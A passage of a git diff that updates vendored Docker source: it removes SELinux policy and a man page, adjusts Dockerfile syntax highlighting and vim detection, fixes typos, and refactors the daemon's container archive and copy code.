-allow docker_t spc_t:process { setsched signal_perms };
-ps_process_pattern(docker_t, spc_t)
-allow docker_t spc_t:socket_class_set { relabelto relabelfrom };
-
-optional_policy(`
-	dbus_chat_system_bus(spc_t)
-')
-
-optional_policy(`
-	unconfined_domain_noaudit(spc_t)
-')
-
-optional_policy(`
-	unconfined_domain(docker_t)
-')
-
-optional_policy(`
-	virt_transition_svirt_sandbox(spc_t, system_r)
-')
-
-########################################
-#
-# docker upstream policy
-#
-
-optional_policy(`
-#    domain_stub_named_filetrans_domain()
-     gen_require(`
-        attribute named_filetrans_domain;
-     ')
-
-      docker_filetrans_named_content(named_filetrans_domain)
-')
-
-optional_policy(`
-    lvm_stub()
-    docker_rw_sem(lvm_t)
-')
-
-optional_policy(`
-    staff_stub()
-    docker_stream_connect(staff_t)
-    docker_exec(staff_t)
-')
-
-optional_policy(`
-    virt_stub_svirt_sandbox_domain()
-    virt_stub_svirt_sandbox_file()
-    allow svirt_sandbox_domain self:netlink_kobject_uevent_socket create_socket_perms;
-    docker_read_share_files(svirt_sandbox_domain)
-    docker_lib_filetrans(svirt_sandbox_domain,svirt_sandbox_file_t, sock_file)
-    docker_use_ptys(svirt_sandbox_domain)
-    docker_spc_stream_connect(svirt_sandbox_domain)
-    fs_list_tmpfs(svirt_sandbox_domain)
-    fs_rw_hugetlbfs_files(svirt_sandbox_domain)
-    fs_dontaudit_remount_tmpfs(svirt_sandbox_domain)
-    dev_dontaudit_mounton_sysfs(svirt_sandbox_domain)
-
-    tunable_policy(`virt_sandbox_use_fusefs',`
-	fs_manage_fusefs_dirs(svirt_sandbox_domain)
-	fs_manage_fusefs_files(svirt_sandbox_domain)
-	fs_manage_fusefs_symlinks(svirt_sandbox_domain)
-    ')
-     gen_require(`
-        attribute domain;
-     ')
-
-     dontaudit svirt_sandbox_domain domain:key {search link};
-')
-
-optional_policy(`
-	gen_require(`
-		type pcp_pmcd_t;
-	')
-	docker_manage_lib_files(pcp_pmcd_t)
-')
diff --git a/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker_selinux.8.gz b/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker_selinux.8.gz
deleted file mode 100644
index ab5d59445ac1601ca378aaa3e71fb9cff43a1592..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 2847
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

diff --git a/vendor/github.com/docker/docker/contrib/syntax/textmate/Docker.tmbundle/Syntaxes/Dockerfile.tmLanguage b/vendor/github.com/docker/docker/contrib/syntax/textmate/Docker.tmbundle/Syntaxes/Dockerfile.tmLanguage
index 948a9bfc20..a4a7b7ae8d 100644
--- a/vendor/github.com/docker/docker/contrib/syntax/textmate/Docker.tmbundle/Syntaxes/Dockerfile.tmLanguage
+++ b/vendor/github.com/docker/docker/contrib/syntax/textmate/Docker.tmbundle/Syntaxes/Dockerfile.tmLanguage
@@ -10,6 +10,23 @@
 	<string>Dockerfile</string>
 	<key>patterns</key>
 	<array>
+		<dict>
+			<key>captures</key>
+			<dict>
+				<key>1</key>
+				<dict>
+					<key>name</key>
+					<string>keyword.other.special-method.dockerfile</string>
+				</dict>
+				<key>2</key>
+				<dict>
+					<key>name</key>
+					<string>keyword.other.special-method.dockerfile</string>
+				</dict>
+			</dict>
+			<key>match</key>
+			<string>^\s*\b(?i:(FROM))\b.*?\b(?i:(AS))\b</string>
+		</dict>
 		<dict>
 			<key>captures</key>
 			<dict>
@@ -25,7 +42,7 @@
 				</dict>
 			</dict>
 			<key>match</key>
-			<string>^\s*(?:(ONBUILD)\s+)?(ADD|ARG|CMD|COPY|ENTRYPOINT|ENV|EXPOSE|FROM|HEALTHCHECK|LABEL|MAINTAINER|RUN|SHELL|STOPSIGNAL|USER|VOLUME|WORKDIR)\s</string>
+			<string>^\s*(?i:(ONBUILD)\s+)?(?i:(ADD|ARG|CMD|COPY|ENTRYPOINT|ENV|EXPOSE|FROM|HEALTHCHECK|LABEL|MAINTAINER|RUN|SHELL|STOPSIGNAL|USER|VOLUME|WORKDIR))\s</string>
 		</dict>
 		<dict>
 			<key>captures</key>
@@ -42,7 +59,7 @@
 				</dict>
 			</dict>
 			<key>match</key>
-			<string>^\s*(?:(ONBUILD)\s+)?(CMD|ENTRYPOINT)\s</string>
+			<string>^\s*(?i:(ONBUILD)\s+)?(?i:(CMD|ENTRYPOINT))\s</string>
 		</dict>
 		<dict>
 			<key>begin</key>
diff --git a/vendor/github.com/docker/docker/contrib/syntax/vim/ftdetect/dockerfile.vim b/vendor/github.com/docker/docker/contrib/syntax/vim/ftdetect/dockerfile.vim
index ee10e5d6a0..a21dd14095 100644
--- a/vendor/github.com/docker/docker/contrib/syntax/vim/ftdetect/dockerfile.vim
+++ b/vendor/github.com/docker/docker/contrib/syntax/vim/ftdetect/dockerfile.vim
@@ -1 +1 @@
-au BufNewFile,BufRead [Dd]ockerfile,Dockerfile.* set filetype=dockerfile
+au BufNewFile,BufRead [Dd]ockerfile,[Dd]ockerfile.*,*.[Dd]ockerfile set filetype=dockerfile
diff --git a/vendor/github.com/docker/docker/contrib/syscall-test/ns.c b/vendor/github.com/docker/docker/contrib/syscall-test/ns.c
index 33684e1c3d..624388630a 100644
--- a/vendor/github.com/docker/docker/contrib/syscall-test/ns.c
+++ b/vendor/github.com/docker/docker/contrib/syscall-test/ns.c
@@ -20,7 +20,7 @@ static int child_exec(void *stuff)
 {
 	struct clone_args *args = (struct clone_args *)stuff;
 	if (execvp(args->argv[0], args->argv) != 0) {
-		fprintf(stderr, "failed to execvp argments %s\n",
+		fprintf(stderr, "failed to execvp arguments %s\n",
 			strerror(errno));
 		exit(-1);
 	}
diff --git a/vendor/github.com/docker/docker/contrib/syscall-test/userns.c b/vendor/github.com/docker/docker/contrib/syscall-test/userns.c
index 2af36f4228..4c5c8d304e 100644
--- a/vendor/github.com/docker/docker/contrib/syscall-test/userns.c
+++ b/vendor/github.com/docker/docker/contrib/syscall-test/userns.c
@@ -20,7 +20,7 @@ static int child_exec(void *stuff)
 {
 	struct clone_args *args = (struct clone_args *)stuff;
 	if (execvp(args->argv[0], args->argv) != 0) {
-		fprintf(stderr, "failed to execvp argments %s\n",
+		fprintf(stderr, "failed to execvp arguments %s\n",
 			strerror(errno));
 		exit(-1);
 	}
diff --git a/vendor/github.com/docker/docker/contrib/vagrant-docker/README.md b/vendor/github.com/docker/docker/contrib/vagrant-docker/README.md
index 286a98504a..736c789998 100644
--- a/vendor/github.com/docker/docker/contrib/vagrant-docker/README.md
+++ b/vendor/github.com/docker/docker/contrib/vagrant-docker/README.md
@@ -31,11 +31,11 @@ stop on runlevel [!2345]
 respawn
 
 script
-    /usr/bin/docker daemon -H=tcp://0.0.0.0:2375
+    /usr/bin/dockerd -H=tcp://0.0.0.0:2375
 end script
 ```
 
-Once that's done, you need to set up a SSH tunnel between your host machine and the vagrant machine that's running Docker. This can be done by running the following command in a host terminal:
+Once that's done, you need to set up an SSH tunnel between your host machine and the vagrant machine that's running Docker. This can be done by running the following command in a host terminal:
 
 ```
 ssh -L 2375:localhost:2375 -p 2222 vagrant@localhost
diff --git a/vendor/github.com/docker/docker/daemon/apparmor_default.go b/vendor/github.com/docker/docker/daemon/apparmor_default.go
index 09dd0541b8..461f5c7f96 100644
--- a/vendor/github.com/docker/docker/daemon/apparmor_default.go
+++ b/vendor/github.com/docker/docker/daemon/apparmor_default.go
@@ -1,6 +1,6 @@
 // +build linux
 
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
 	"fmt"
@@ -28,7 +28,7 @@ func ensureDefaultAppArmorProfile() error {
 
 		// Load the profile.
 		if err := aaprofile.InstallDefault(defaultApparmorProfile); err != nil {
-			return fmt.Errorf("AppArmor enabled on system but the %s profile could not be loaded.", defaultApparmorProfile)
+			return fmt.Errorf("AppArmor enabled on system but the %s profile could not be loaded: %s", defaultApparmorProfile, err)
 		}
 	}
 
diff --git a/vendor/github.com/docker/docker/daemon/apparmor_default_unsupported.go b/vendor/github.com/docker/docker/daemon/apparmor_default_unsupported.go
index cd2dd9702e..51f9c526b3 100644
--- a/vendor/github.com/docker/docker/daemon/apparmor_default_unsupported.go
+++ b/vendor/github.com/docker/docker/daemon/apparmor_default_unsupported.go
@@ -1,6 +1,6 @@
 // +build !linux
 
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 func ensureDefaultAppArmorProfile() error {
 	return nil
diff --git a/vendor/github.com/docker/docker/daemon/archive.go b/vendor/github.com/docker/docker/daemon/archive.go
index 1999f1243b..9c7971b56e 100644
--- a/vendor/github.com/docker/docker/daemon/archive.go
+++ b/vendor/github.com/docker/docker/daemon/archive.go
@@ -1,20 +1,18 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
-	"errors"
 	"io"
 	"os"
-	"path/filepath"
 	"strings"
 
 	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/builder"
 	"github.com/docker/docker/container"
+	"github.com/docker/docker/errdefs"
 	"github.com/docker/docker/pkg/archive"
 	"github.com/docker/docker/pkg/chrootarchive"
-	"github.com/docker/docker/pkg/idtools"
 	"github.com/docker/docker/pkg/ioutils"
 	"github.com/docker/docker/pkg/system"
+	"github.com/pkg/errors"
 )
 
 // ErrExtractPointNotDirectory is used to convey that the operation to extract
@@ -22,6 +20,31 @@ import (
 // path does not refer to a directory.
 var ErrExtractPointNotDirectory = errors.New("extraction point is not a directory")
 
+// The daemon will use the following interfaces if the container fs implements
+// these for optimized copies to and from the container.
+type extractor interface {
+	ExtractArchive(src io.Reader, dst string, opts *archive.TarOptions) error
+}
+
+type archiver interface {
+	ArchivePath(src string, opts *archive.TarOptions) (io.ReadCloser, error)
+}
+
+// helper functions to extract or archive
+func extractArchive(i interface{}, src io.Reader, dst string, opts *archive.TarOptions) error {
+	if ea, ok := i.(extractor); ok {
+		return ea.ExtractArchive(src, dst, opts)
+	}
+	return chrootarchive.Untar(src, dst, opts)
+}
+
+func archivePath(i interface{}, src string, opts *archive.TarOptions) (io.ReadCloser, error) {
+	if ap, ok := i.(archiver); ok {
+		return ap.ArchivePath(src, opts)
+	}
+	return archive.TarWithOptions(src, opts)
+}
+
 // ContainerCopy performs a deprecated operation of archiving the resource at
 // the specified path in the container identified by the given name.
 func (daemon *Daemon) ContainerCopy(name string, res string) (io.ReadCloser, error) {
@@ -30,11 +53,20 @@ func (daemon *Daemon) ContainerCopy(name string, res string) (io.ReadCloser, err
 		return nil, err
 	}
 
-	if res[0] == '/' || res[0] == '\\' {
-		res = res[1:]
+	// Make sure an online file-system operation is permitted.
+	if err := daemon.isOnlineFSOperationPermitted(container); err != nil {
+		return nil, errdefs.System(err)
 	}
 
-	return daemon.containerCopy(container, res)
+	data, err := daemon.containerCopy(container, res)
+	if err == nil {
+		return data, nil
+	}
+
+	if os.IsNotExist(err) {
+		return nil, containerFileNotFound{res, name}
+	}
+	return nil, errdefs.System(err)
 }
 
 // ContainerStatPath stats the filesystem resource at the specified path in the
@@ -45,7 +77,20 @@ func (daemon *Daemon) ContainerStatPath(name string, path string) (stat *types.C
 		return nil, err
 	}
 
-	return daemon.containerStatPath(container, path)
+	// Make sure an online file-system operation is permitted.
+	if err := daemon.isOnlineFSOperationPermitted(container); err != nil {
+		return nil, errdefs.System(err)
+	}
+
+	stat, err = daemon.containerStatPath(container, path)
+	if err == nil {
+		return stat, nil
+	}
+
+	if os.IsNotExist(err) {
+		return nil, containerFileNotFound{path, name}
+	}
+	return nil, errdefs.System(err)
 }
 
 // ContainerArchivePath creates an archive of the filesystem resource at the
@@ -57,7 +102,20 @@ func (daemon *Daemon) ContainerArchivePath(name string, path string) (content io
 		return nil, nil, err
 	}
 
-	return daemon.containerArchivePath(container, path)
+	// Make sure an online file-system operation is permitted.
+	if err := daemon.isOnlineFSOperationPermitted(container); err != nil {
+		return nil, nil, errdefs.System(err)
+	}
+
+	content, stat, err = daemon.containerArchivePath(container, path)
+	if err == nil {
+		return content, stat, nil
+	}
+
+	if os.IsNotExist(err) {
+		return nil, nil, containerFileNotFound{path, name}
+	}
+	return nil, nil, errdefs.System(err)
 }
 
 // ContainerExtractToDir extracts the given archive to the specified location
@@ -66,13 +124,26 @@ func (daemon *Daemon) ContainerArchivePath(name string, path string) (content io
 // be ErrExtractPointNotDirectory. If noOverwriteDirNonDir is true then it will
 // be an error if unpacking the given content would cause an existing directory
 // to be replaced with a non-directory and vice versa.
-func (daemon *Daemon) ContainerExtractToDir(name, path string, noOverwriteDirNonDir bool, content io.Reader) error {
+func (daemon *Daemon) ContainerExtractToDir(name, path string, copyUIDGID, noOverwriteDirNonDir bool, content io.Reader) error {
 	container, err := daemon.GetContainer(name)
 	if err != nil {
 		return err
 	}
 
-	return daemon.containerExtractToDir(container, path, noOverwriteDirNonDir, content)
+	// Make sure an online file-system operation is permitted.
+	if err := daemon.isOnlineFSOperationPermitted(container); err != nil {
+		return errdefs.System(err)
+	}
+
+	err = daemon.containerExtractToDir(container, path, copyUIDGID, noOverwriteDirNonDir, content)
+	if err == nil {
+		return nil
+	}
+
+	if os.IsNotExist(err) {
+		return containerFileNotFound{path, name}
+	}
+	return errdefs.System(err)
 }
 
 // containerStatPath stats the filesystem resource at the specified path in this
@@ -92,6 +163,9 @@ func (daemon *Daemon) containerStatPath(container *container.Container, path str
 		return nil, err
 	}
 
+	// Normalize path before sending to rootfs
+	path = container.BaseFS.FromSlash(path)
+
 	resolvedPath, absPath, err := container.ResolvePath(path)
 	if err != nil {
 		return nil, err
@@ -132,6 +206,9 @@ func (daemon *Daemon) containerArchivePath(container *container.Container, path
 		return nil, nil, err
 	}
 
+	// Normalize path before sending to rootfs
+	path = container.BaseFS.FromSlash(path)
+
 	resolvedPath, absPath, err := container.ResolvePath(path)
 	if err != nil {
 		return nil, nil, err
@@ -150,7 +227,18 @@ func (daemon *Daemon) containerArchivePath(container *container.Container, path
 	// also catches the case when the root directory of the container is
 	// requested: we want the archive entries to start with "/" and not the
 	// container ID.
-	data, err := archive.TarResourceRebase(resolvedPath, filepath.Base(absPath))
+	driver := container.BaseFS
+
+	// Get the source and the base paths of the container resolved path in order
+	// to get the proper tar options for the rebase tar.
+	resolvedPath = driver.Clean(resolvedPath)
+	if driver.Base(resolvedPath) == "." {
+		resolvedPath += string(driver.Separator()) + "."
+	}
+	sourceDir, sourceBase := driver.Dir(resolvedPath), driver.Base(resolvedPath)
+	opts := archive.TarResourceRebaseOpts(sourceBase, driver.Base(absPath))
+
+	data, err := archivePath(driver, sourceDir, opts)
 	if err != nil {
 		return nil, nil, err
 	}
@@ -174,7 +262,7 @@ func (daemon *Daemon) containerArchivePath(container *container.Container, path
 // noOverwriteDirNonDir is true then it will be an error if unpacking the
 // given content would cause an existing directory to be replaced with a non-
 // directory and vice versa.
-func (daemon *Daemon) containerExtractToDir(container *container.Container, path string, noOverwriteDirNonDir bool, content io.Reader) (err error) {
+func (daemon *Daemon) containerExtractToDir(container *container.Container, path string, copyUIDGID, noOverwriteDirNonDir bool, content io.Reader) (err error) {
 	container.Lock()
 	defer container.Unlock()
 
@@ -189,8 +277,12 @@ func (daemon *Daemon) containerExtractToDir(container *container.Container, path
 		return err
 	}
 
+	// Normalize path before sending to rootfs'
+	path = container.BaseFS.FromSlash(path)
+	driver := container.BaseFS
+
 	// Check if a drive letter supplied, it must be the system drive. No-op except on Windows
-	path, err = system.CheckSystemDriveAndRemoveDriveLetter(path)
+	path, err = system.CheckSystemDriveAndRemoveDriveLetter(path, driver)
 	if err != nil {
 		return err
 	}
@@ -202,7 +294,10 @@ func (daemon *Daemon) containerExtractToDir(container *container.Container, path
 	// that you can extract an archive to a symlink that points to a directory.
 
 	// Consider the given path as an absolute path in the container.
-	absPath := archive.PreserveTrailingDotOrSeparator(filepath.Join(string(filepath.Separator), path), path)
+	absPath := archive.PreserveTrailingDotOrSeparator(
+		driver.Join(string(driver.Separator()), path),
+		path,
+		driver.Separator())
 
 	// This will evaluate the last path element if it is a symlink.
 	resolvedPath, err := container.GetResourcePath(absPath)
@@ -210,7 +305,7 @@ func (daemon *Daemon) containerExtractToDir(container *container.Container, path
 		return err
 	}
 
-	stat, err := os.Lstat(resolvedPath)
+	stat, err := driver.Lstat(resolvedPath)
 	if err != nil {
 		return err
 	}
@@ -233,21 +328,24 @@ func (daemon *Daemon) containerExtractToDir(container *container.Container, path
 	// a volume file path.
 	var baseRel string
 	if strings.HasPrefix(resolvedPath, `\\?\Volume{`) {
-		if strings.HasPrefix(resolvedPath, container.BaseFS) {
-			baseRel = resolvedPath[len(container.BaseFS):]
+		if strings.HasPrefix(resolvedPath, driver.Path()) {
+			baseRel = resolvedPath[len(driver.Path()):]
 			if baseRel[:1] == `\` {
 				baseRel = baseRel[1:]
 			}
 		}
 	} else {
-		baseRel, err = filepath.Rel(container.BaseFS, resolvedPath)
+		baseRel, err = driver.Rel(driver.Path(), resolvedPath)
 	}
 	if err != nil {
 		return err
 	}
 	// Make it an absolute path.
-	absPath = filepath.Join(string(filepath.Separator), baseRel)
+	absPath = driver.Join(string(driver.Separator()), baseRel)
 
+	// @ TODO: gupta-ak: Technically, this works since it no-ops
+	// on Windows and the file system is local anyway on linux.
+	// But eventually, it should be made driver aware.
 	toVolume, err := checkIfPathIsInAVolume(container, absPath)
 	if err != nil {
 		return err
@@ -257,14 +355,19 @@ func (daemon *Daemon) containerExtractToDir(container *container.Container, path
 		return ErrRootFSReadOnly
 	}
 
-	uid, gid := daemon.GetRemappedUIDGID()
-	options := &archive.TarOptions{
-		NoOverwriteDirNonDir: noOverwriteDirNonDir,
-		ChownOpts: &archive.TarChownOptions{
-			UID: uid, GID: gid, // TODO: should all ownership be set to root (either real or remapped)?
-		},
+	options := daemon.defaultTarCopyOptions(noOverwriteDirNonDir)
+
+	if copyUIDGID {
+		var err error
+		// tarCopyOptions will appropriately pull in the right uid/gid for the
+		// user/group and will set the options.
+		options, err = daemon.tarCopyOptions(container, noOverwriteDirNonDir)
+		if err != nil {
+			return err
+		}
 	}
-	if err := chrootarchive.Untar(content, resolvedPath, options); err != nil {
+
+	if err := extractArchive(driver, content, resolvedPath, options); err != nil {
 		return err
 	}
 
@@ -274,6 +377,9 @@ func (daemon *Daemon) containerExtractToDir(container *container.Container, path
 }
 
 func (daemon *Daemon) containerCopy(container *container.Container, resource string) (rc io.ReadCloser, err error) {
+	if resource[0] == '/' || resource[0] == '\\' {
+		resource = resource[1:]
+	}
 	container.Lock()
 
 	defer func() {
@@ -302,24 +408,28 @@ func (daemon *Daemon) containerCopy(container *container.Container, resource str
 		return nil, err
 	}
 
+	// Normalize path before sending to rootfs
+	resource = container.BaseFS.FromSlash(resource)
+	driver := container.BaseFS
+
 	basePath, err := container.GetResourcePath(resource)
 	if err != nil {
 		return nil, err
 	}
-	stat, err := os.Stat(basePath)
+	stat, err := driver.Stat(basePath)
 	if err != nil {
 		return nil, err
 	}
 	var filter []string
 	if !stat.IsDir() {
-		d, f := filepath.Split(basePath)
+		d, f := driver.Split(basePath)
 		basePath = d
 		filter = []string{f}
 	} else {
-		filter = []string{filepath.Base(basePath)}
-		basePath = filepath.Dir(basePath)
+		filter = []string{driver.Base(basePath)}
+		basePath = driver.Dir(basePath)
 	}
-	archive, err := archive.TarWithOptions(basePath, &archive.TarOptions{
+	archive, err := archivePath(driver, basePath, &archive.TarOptions{
 		Compression:  archive.Uncompressed,
 		IncludeFiles: filter,
 	})
@@ -337,100 +447,3 @@ func (daemon *Daemon) containerCopy(container *container.Container, resource str
 	daemon.LogContainerEvent(container, "copy")
 	return reader, nil
 }
-
-// CopyOnBuild copies/extracts a source FileInfo to a destination path inside a container
-// specified by a container object.
-// TODO: make sure callers don't unnecessarily convert destPath with filepath.FromSlash (Copy does it already).
-// CopyOnBuild should take in abstract paths (with slashes) and the implementation should convert it to OS-specific paths.
-func (daemon *Daemon) CopyOnBuild(cID string, destPath string, src builder.FileInfo, decompress bool) error {
-	srcPath := src.Path()
-	destExists := true
-	destDir := false
-	rootUID, rootGID := daemon.GetRemappedUIDGID()
-
-	// Work in daemon-local OS specific file paths
-	destPath = filepath.FromSlash(destPath)
-
-	c, err := daemon.GetContainer(cID)
-	if err != nil {
-		return err
-	}
-	err = daemon.Mount(c)
-	if err != nil {
-		return err
-	}
-	defer daemon.Unmount(c)
-
-	dest, err := c.GetResourcePath(destPath)
-	if err != nil {
-		return err
-	}
-
-	// Preserve the trailing slash
-	// TODO: why are we appending another path separator if there was already one?
-	if strings.HasSuffix(destPath, string(os.PathSeparator)) || destPath == "." {
-		destDir = true
-		dest += string(os.PathSeparator)
-	}
-
-	destPath = dest
-
-	destStat, err := os.Stat(destPath)
-	if err != nil {
-		if !os.IsNotExist(err) {
-			//logrus.Errorf("Error performing os.Stat on %s. %s", destPath, err)
-			return err
-		}
-		destExists = false
-	}
-
-	uidMaps, gidMaps := daemon.GetUIDGIDMaps()
-	archiver := &archive.Archiver{
-		Untar:   chrootarchive.Untar,
-		UIDMaps: uidMaps,
-		GIDMaps: gidMaps,
-	}
-
-	if src.IsDir() {
-		// copy as directory
-		if err := archiver.CopyWithTar(srcPath, destPath); err != nil {
-			return err
-		}
-		return fixPermissions(srcPath, destPath, rootUID, rootGID, destExists)
-	}
-	if decompress && archive.IsArchivePath(srcPath) {
-		// Only try to untar if it is a file and that we've been told to decompress (when ADD-ing a remote file)
-
-		// First try to unpack the source as an archive
-		// to support the untar feature we need to clean up the path a little bit
-		// because tar is very forgiving.  First we need to strip off the archive's
-		// filename from the path but this is only added if it does not end in slash
-		tarDest := destPath
-		if strings.HasSuffix(tarDest, string(os.PathSeparator)) {
-			tarDest = filepath.Dir(destPath)
-		}
-
-		// try to successfully untar the orig
-		err := archiver.UntarPath(srcPath, tarDest)
-		/*
-			if err != nil {
-				logrus.Errorf("Couldn't untar to %s: %v", tarDest, err)
-			}
-		*/
-		return err
-	}
-
-	// only needed for fixPermissions, but might as well put it before CopyFileWithTar
-	if destDir || (destExists && destStat.IsDir()) {
-		destPath = filepath.Join(destPath, src.Name())
-	}
-
-	if err := idtools.MkdirAllNewAs(filepath.Dir(destPath), 0755, rootUID, rootGID); err != nil {
-		return err
-	}
-	if err := archiver.CopyFileWithTar(srcPath, destPath); err != nil {
-		return err
-	}
-
-	return fixPermissions(srcPath, destPath, rootUID, rootGID, destExists)
-}
diff --git a/vendor/github.com/docker/docker/daemon/archive_tarcopyoptions.go b/vendor/github.com/docker/docker/daemon/archive_tarcopyoptions.go
new file mode 100644
